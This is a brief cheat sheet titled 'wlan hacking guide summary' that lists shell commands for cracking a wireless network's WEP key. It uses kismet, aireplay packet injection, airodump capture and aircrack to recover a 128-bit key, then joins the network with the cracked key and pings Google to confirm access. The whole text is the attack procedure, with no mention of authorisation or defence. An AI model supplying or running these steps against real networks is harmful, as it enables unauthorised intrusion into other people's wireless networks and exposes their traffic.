wlan hacking guide summary
1st shell:
> show-wireless-interface.sh
> nano/etc/kismet/kismet.conf
2nd shell:
> cd /pentest/wireless/aireplay-2.2/
> ls -l
> ./start-aireplay.sh
> ./wlanng.sh start wlan0 10
1st shell:
> cd /pentest/wireless/aircrack-2.1/
> ./airodump wlan0 filename
2nd shell:
> ./aireplay -x 512 wlan0
compare bssid with destination mac address
> ls -l
> ./aircrack -n 128 filename.cap
> iwconfig wlan0 key my-h4x3d-key
> ping www.google.com